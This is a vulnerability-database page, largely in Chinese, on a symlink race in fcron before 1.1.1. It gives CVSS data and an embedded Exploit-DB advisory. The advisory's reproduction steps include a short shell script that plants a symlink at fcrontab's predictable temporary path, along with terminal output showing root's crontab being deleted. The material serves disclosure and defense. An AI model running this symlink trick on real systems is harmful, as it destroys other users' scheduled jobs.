发布时间 :2001-09-20 00:00:00
修订时间 :2016-10-17 22:11:45

[原文]Thibault Godouet FCron prior to 1.1.1 allows a local user to corrupt another user's crontab file via a symlink attack on the fcrontab temporary file.

[CNNVD]Thibault Godouet Fcron计时文件受到威胁(CNNVD-200109-065)

        Thibault Godouet Fcron之前1.1.1版本存在漏洞。本地用户可以借助fcrontab临时文件上的链接攻击腐化另一个用户的计时任务文件。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20010228 fcron 0.9.5 is vulnerable to a symlink attack
(UNKNOWN)  XF  fcron-tmpfile-symlink(7127)

- 漏洞信息

低危 未知
2001-09-20 00:00:00 2005-05-02 00:00:00
- 漏洞信息 (20905)

Thibault Godouet FCron 1 Symbolic Link Vulnerability (EDBID:20905)
unix local
2001-06-07 Verified
0 Uwe Ohse
N/A [点击下载]

FCron is an implementation of the popular UNIX 'cron' utility that runs user-specified programs at periodic scheduled times.

fcron is vulnerable to symbolic link attacks.

It is possible for an attacker to anticipate the expected name of an fcron tempfile. Attackers can create a symbolic link with an anticipated filename pointing to files on the system writable by the fcron group. This could allow an attacker to corrupt another user's crontab file, interfering with scheduled events and potentially creating a denial of service.

In addition, the ability to cause deletion of user crontabs has been demonstrated by the discoverer.

How to repeat:

1. Install a crontab, for example for the root user:

root# ls -l /var/spool/fcron/
total 0
root# echo '0 0 * * * echo test' | fcrontab -
09:53:00 installing file /tmp/fcrontab.27301 for user root
Modifications will be taken into account right now.
root# ls -l /var/spool/fcron/
total 2
-rw------- 1 root root 110 May 7 09:53 root
-rw------- 1 root fcron 20 May 7 09:53 root.orig

2. As a normal user write and execute a script:

uwe$ cat ~/x
#! /bin/sh
ln -s /var/spool/fcron/rm.root /tmp/fcrontab.$$
exec fcrontab - <<EOF
* * * * * false
uwe$ ./x
09:55:55 installing file /tmp/fcrontab.27536 for user uwe
09:55:55 User uwe can't read file "/tmp/fcrontab.27536": Permission denied

3. As root look into the fcron spool directory:

root# ls -l /var/spool/fcron/
total 3
-rw-r----- 1 uwe fcron 16 May 7 09:55 rm.root
-rw------- 1 root root 110 May 7 09:53 root
-rw------- 1 root fcron 20 May 7 09:53 root.orig

4. As the normal user edit your crontab:

uwe$ echo '* * * * * true' | fcrontab -
09:59:15 installing file /tmp/fcrontab.27543 for user uwe
Modifications will be taken into account at 10h00.

5. As root wait up to a minute and look into the fcron spool directory:

# ls -l /var/spool/fcron/
total 3
-rw------- 1 root fcron 20 May 7 09:53 root.orig
-rw------- 1 root root 102 May 7 09:59 uwe
-rw-r----- 1 fcron fcron 15 May 7 09:59 uwe.orig

6. Root's crontab is gone, look into your backups. 		

- 漏洞信息

Fcron fcrontab Symlink File Corruption DoS
Local Access Required Denial of Service, Race Condition
Loss of Availability

- 漏洞描述

- 时间线

2001-02-27 Unknow
2001-02-27 Unknow

- 相关参考

- 漏洞作者

